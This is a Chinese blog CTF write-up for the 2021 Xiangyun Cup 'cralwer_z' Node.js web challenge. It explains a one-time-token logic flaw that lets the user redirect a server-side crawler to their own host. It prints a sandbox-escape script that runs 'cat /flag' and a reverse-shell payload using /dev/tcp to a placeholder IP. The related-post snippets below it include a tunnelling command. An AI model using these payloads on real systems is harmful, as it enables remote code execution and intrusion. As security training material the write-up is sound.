[2021祥云杯]cralwer_z

最新推荐文章于 2022-11-04 09:26:13 发布
最新推荐文章于 2022-11-04 09:26:13 发布
阅读量511 收藏
点赞数
分类专栏: CTF刷题记录 文章标签: node.js CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/124189883
版权

[2021祥云杯]cralwer_z

文章目录


题目在buu复现,给了附件

关键的代码在user.js中,我们着重对其进行分析

const express = require('express');
const crypto = require('crypto');
const createError = require('http-errors');
const { Op } = require('sequelize');
const { User, Token } = require('../database');
const utils = require('../utils');
const Crawler = require('../crawler');

const router = express.Router();


router.get('/', async (req, res) => {
    const user = await User.findByPk(req.session.userId)
    return res.render('index', { username: user.username });    //渲染
});


router.get('/profile', async (req, res) => {
    const user = await User.findByPk(req.session.userId);
    return res.render('user', { user });        //渲染
});

//profile路由
router.post('/profile', async (req, res, next) => {
    let { affiliation, age, bucket } = req.body;
    const user = await User.findByPk(req.session.userId);
    //对信息进行校验
    if (!affiliation || !age || !bucket || typeof (age) !== "string" || typeof (bucket) !== "string" || typeof (affiliation) != "string") {
        return res.render('user', { user, error: "Parameters error or blank." });
    }
    if (!utils.checkBucket(bucket)) {
        return res.render('user', { user, error: "Invalid bucket url." });
    }
    let authToken;
    try {
        //更新用户信息,bucket的值传递给personalBucket
        await User.update({
            affiliation,
            age,
            personalBucket: bucket
        }, {
            where: { userId: req.session.userId }
        });
        //生成token
        const token = crypto.randomBytes(32).toString('hex');
        //传递
        authToken = token;
        //生成token
        await Token.create({ userId: req.session.userId, token, valid: true });
        //对数据库中能找到的userId以及token进行查询,将已有的token的valid设置为false,即销毁
        await Token.update({
            valid: false,
        }, {
            where: {
                userId: req.session.userId,
                token: { [Op.not]: authToken }
            }
        });
    } catch (err) {
        next(createError(500));
    }
    //对bucket进行正则匹配,然后将刚刚生成的token进行打印
    if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(bucket)) {
        //重定向到verify
        res.redirect(`/user/verify?token=${authToken}`)
    } else {
        // Well, admin won't do that actually XD. 
        return res.render('user', { user: user, message: "Admin will check if your bucket is qualified later." });
    }
});

//verify路由
router.get('/verify', async (req, res, next) => {
    let { token } = req.query;
    //对token进行检测
    if (!token || typeof (token) !== "string") {
        return res.send("Parameters error");
    }
    let user = await User.findByPk(req.session.userId);
    //找对数据库中已有的token
    const result = await Token.findOne({
        token,
        userId: req.session.userId,
        valid: true
    });
    if (result) {
        try {
            //让token失效,一个token只能用一次
            await Token.update({
                valid: false
            }, {
                where: { userId: req.session.userId }
            });
            //更新用户信息,注意bucket: user.personalBucket,将personalBucket的值赋给bucket
            await User.update({
                bucket: user.personalBucket
            }, {
                where: { userId: req.session.userId }
            });

            user = await User.findByPk(req.session.userId);     //根据主键进行查询
            return res.render('user', { user, message: "Successfully update your bucket from personal bucket!" });
        } catch (err) {
            next(createError(500));
        }
    } else {
        user = await User.findByPk(req.session.userId); //根据主键进行查询
        return res.render('user', { user, message: "Failed to update, check your token carefully" })
    }
})


// Not implemented yet
router.get('/bucket', async (req, res) => {
    const user = await User.findByPk(req.session.userId);       //根据主键进行查询
    //正则匹配
    if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) {
        return res.json({ message: "Sorry but our remote oss server is under maintenance" });
    } else {
        // Should be a private site for Admin
        try {
            //这里新建了一个Crawler类的对象page
            const page = new Crawler({
                userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
                referrer: 'https://www.ichunqiu.com/',
                waitDuration: '3s'
            });
            //goto,到crawler.js中
            await page.goto(user.bucket);
            const html = page.htmlContent;
            const headers = page.headers;
            const cookies = page.cookies;
            await page.close();

            return res.json({ html, headers, cookies});
        } catch (err) {
            return res.json({ err: 'Error visiting your bucket. ' })
        }
    }
});



module.exports = router;

分析代码之前需要知道的事情

sequelize常见API使用_风雨诗轩的博客-CSDN博客_findbypk

这段代码中,大量使用sequelize的查询,所以要先了解一些这些查询语句

  1. findOne

根据id查询一条记录

demo

const favors = await UserModel.findOne({
    attributes: [['user_favorites', 'userFavors']], //将user_favorites属性重命名为userFavors
    where: {
        id: `${id}`
    }
}).catch(err => {
    getLogger().error("xxx occur error=", err);
});
  1. findByPk

通过主键来查询一条记录

demo

await UserModel.findByPk(id).then(......

在本题中,主键是userId

代码分析

按路由来进行代码分析吧,一般而言每个路由对应不同的功能,而且思路也比较清晰

user.js中,主要是3个路由/profile,verify,bucket

/profile路由

首先来看/profile路由

前面部分是传参,对参数进行检测

在这里插入图片描述

bucket将临时存放在personalBucket,生成token

在这里插入图片描述

然后对bucket进行正则匹配,匹配成功会进行跳转到/verify,并将token打印出来

在这里插入图片描述

/verify路由

再来看/verify路由

刚开始也是进行参数的检测

在这里插入图片描述

然后根据userid获取数据库中存储的信息,并且获取其第一条信息,如果找到,就更新它的validfalse,让其失效

在这里插入图片描述

然后更新信息,将user.personalBucket的值传到bucket

在这里插入图片描述

/bucket路由

最后看第三个路由/bucket

根据主键userId查询,然后对user.bucket进行正则匹配,这里绕过正则匹配之后,会新建一个Crawler类的对象page,然后调用goto方法

在这里插入图片描述

我们跟进看这个goto方法,goto方法中实现了this.crawler.visit方法,这个visit方法会去访问一个我们传入的url参数,而这里也是漏洞点

    goto(url) {
        return new Promise((resolve, reject) => {
            try {
                //实现了this.crawler.visit方法
                this.crawler.visit(url, () => {
                    const resource = this.crawler.resources.length
                        ? this.crawler.resources.filter(resource => resource.response).shift() : null;
                    this.statusCode = resource.response.status
                    this.headers = this.getHeaders();
                    this.cookies = this.getCookies();
                    this.htmlContent = this.getHtmlContent();
                    resolve();
                });
            } catch (err) {
                reject(err.message);
            }
        })
    }

在正常情况下,我们访问/profile路由,生成token,但是会自动跳转到/verify路由,然后将我们的token的valid置为flase让其失效,达到一次性token的效果;然后将数据库中的personalBucket传入bucket

注意有两次正则匹配,他们的匹配规则是一样的,但是我们想要的效果是不一样的,在/profile路由中,我们要让其符号正则匹配条件,然后将token打印出来;在/bucket路由中,我们要其不符合真个匹配条件,让其执行goto方法

解题思路

所以思路是:

  1. 首先访问/profile,生成一个token,会将其传入personalBucket暂存;这个时候,我们要用burp抓包不让其跳转到/verify
  2. 然后再访问/profile,更新personalBucket,将其改为我们的url
  3. 然后再利用第一次获取到的tokenverify,在/verify中会将数据库中的personalBucketbucket赋值,而personalBucket已经在第二步被我们替换了
  4. 利用其访问bucket,反弹shell,或者cat /flag

实际操作

注册用户,登录,然后去/profile点击update,抓包

在这里插入图片描述

send,拿到token

在这里插入图片描述

这个时候,这个包就卡在这里,不会去访问/verify

然后再次将这个包发给repeater,将bucket进行修改,替换为自己的vps

在这里插入图片描述

这个时候,我们再次返回burp第一个我们拿到的包,点击Follow redirection

然后就可以看到bucket成功更新

在这里插入图片描述

然后在vps上的80端口挂一个拿flag的脚本,或者是自己的vps上的80端口已经有一个http服务

python3 -m http.server 80

脚本

<script>
a=this.constructor.constructor.constructor.constructor('return process')();b=a.mainModule.require('child_process');c=b.execSync('cat /flag').toString();document.write(c);
</script>

然后访问/user/bucket,拿到flag

在这里插入图片描述

或者是整个反弹shell的脚本

<script>c='constructor';this[c][c]("c='constructor';require=this[c][c]('return process')().mainModule.require;var sync=require('child_process').spawnSync; var ls = sync('bash', ['-c','bash -i >& /dev/tcp/xx.xx.xx.xx/7002 0>&1'],);console.log(ls.output.toString());")()</script>

监听7002端口

在这里插入图片描述

Sk1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4305
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
祥云-WRITEUP-bad_cat战队
最新发布
qq_44005305的博客
02-21 439
先监听后上传,就不会报500的错误了 此时再去submit sessions sessions id 执行拿到shell再 bash -i 2>&1 ,上传一个ew内网穿透(github.com/idlefire/ew…%25EF%25BC%258Cchmod%25E4%25B8%258B "https://github.com/idlefire/ew)%EF%BC%8Cchmod%E4%B8%8B") msf的upload shell执行 ./ew -s rssocks -d 82.157.25.143
2020祥云 CTFNu1L.pdf
03-15
2020祥云 CTF WP 高清PDF版
【pwn】2022 祥云 部分wp
woodwhale的博客
10-31 1209
2022 祥云 pwn 部分wp,有空复现别的题目
祥云2021 Web复现
feng的博客
08-25 1845
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
Python_Crawler:使用Python工具的Internet Cralwer
03-19
在IT领域,网络爬虫(Internet Crawler)是一种自动化程序,用于从互联网上抓取大量数据,以便进行数据分析、搜索引擎索引或者特定信息提取。在这个主题中,我们将深入探讨如何使用Python来构建一个网络爬虫。...
PyPI 官网下载 | alphaj_naver_stock_cralwer-0.1.1-py3-none-any.whl
02-08
《PyPI官网下载:了解与使用Python库"alphaj_naver_stock_cralwer"》 在Python编程领域,PyPI(Python Package Index)是全球最大的Python软件仓库,它提供了丰富的第三方库,使得开发者能够轻松地下载和安装所需的...
infraero_cralwer:Projeto desenvolvido,básicosobre网络爬虫和Ruby
03-17
【infraero_cralwer项目:探索网络爬虫与Ruby的基础】 该项目名为"infraero_cralwer",旨在介绍网络爬虫的基本概念和技术,同时利用Ruby编程语言进行实现。Ruby是一种面向对象的、易于理解的语言,常被用于开发各种...
FundCrawler:爬取天天基金网,辅助对投资基金的选择
05-26
2021-01-24更新 若存在问题,请切换回Release版本 功能特性 爬取基金的近1、3、6月,近1、3年及成立来的收益率,当前基金经理及其任职时间、任职来的收益率及总的任职时间 模仿tcp的拥塞避免的线程数量控制,慢开始...
2021祥云 CTF pwn解 wp
qq_39948058的博客
08-26 1164
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
BUU刷题记录——7
weixin_43610673的博客
02-20 3421
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不传值得话就可以进入if语句,跟进_fo
2021祥云web 部分wp
fmyyy1的博客
08-23 724
ezyii 说是最新的链子,题目把文件都筛选好了让我们找。写一下我的思路 看到RunProcess类 <?php namespace Codeception\Extension; class RunProcess { protected $output; protected $config = ['sleep' => 0]; protected static $events = []; private $processes = []; publ
NB物联网之天翼物联(2)——profile定义与使用
不吃带叶的
11-30 3097
前言 前面大体讲了电信NB平台的一些概念,本篇就来接触一下电信NB的核心配置,profile与编解码插件。profile 就是配置文件嘛!编解码插件就是编解我们与设备通讯使用的十六进制码流的东西。 profile的定义 每一个service包含属性和命令两部分 属性对应的是上传的数据,我们定义好规则之后,上传的16进制码流会根据我们定义的规则拆分到指定的service的 属性列表 中的 属性...
祥云2022 writeup
渗透测试研究中心
11-02 1922
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
Burpsuite跟踪重定向
anan的博客
04-16 2217
目录前言使用场景跟踪重定向repeater中查看重定向后面的响应包关注我 前言 为什么今天写这么基础的文章出来呢?因为这个知识点可能对于萌新来说比较陌生,今天刚好又遇到了类似的场景,所以今天来进行一次简单的记录,作为个人记录,也希望能帮助到各位! 使用场景 这里简单描述下我遇到的场景:一个登录入口,我想通过burpsuite测试一下是否有验证码复用、用户名枚举之类的问题,结果发现,repeater响应的包都是302,这个时候萌新就会非常懵逼了,但是作为一个刚刚从萌新走过来的年轻人,我非常自然的点了一个按钮,
第十三章——Burpsuite三(Repeater、Sequencer、Decoder、Comparer、Options)
weixin_43876557的博客
09-17 654
Burpsuite Repeater 1.Repeater 使用 可以右键将请求发送到repeater: 发送到repeater后可以手动修改并点击send进行请求的重复提交。 对于凡是有变量的地方,我们都可以修改内容对其进行一个注入,发送请求,根据返回的结果进行判断是否存在某种漏洞。 2.数据包右键菜单 (1)改变请求方式 点击send发送请求后会收到回复。 raw:返回原始数据 headers:头部分 Hex:十六进制的形式显示 Html:以Html源码进行显示,不显示头 Render:对页面进行渲
BurpSuite2021系列(七)Repeater详解
46的十哥哥的5哥哥
07-26 2641
本文视频版在B站:https://www.bilibili.com/video/BV1aq4y1X7oE?p=7 视频版更加详细,涉及各个参数讲解。 前言 Burp Repeater作为Burp Suite中一款手工验证HTTP消息的测试工具,通常用于多次重放请求响应和手工修改请求消息的修改后对服务器端响应的消息分析。本章我们主要学习的内容有: Repeater的使用 可选项设置(Options) Repeater的使用 在渗透测试过程中,我们经常使用Repeater来进行请求与响应的消息验证分析,比
[祥云 2022]ezjava
Sentiment的博客
11-04 1029
比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
Express实战(一) 项目结构搭建及验证、加密
赤蓝紫の博客
03-06 1360
Express实战(一) 项目结构搭建及验证、加密 开源项目: github仓库 接口文档 个人博客:[Express实战(一) 项目结构搭建及验证、加密](https://clz.vercel.app/2022/03/06/express-3/) RESTful接口设计规范 最终结果:realworld-api-express-practise- 1. 创建项目 mkdir realworld-api-express cd realworld-api-express npm init -y

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值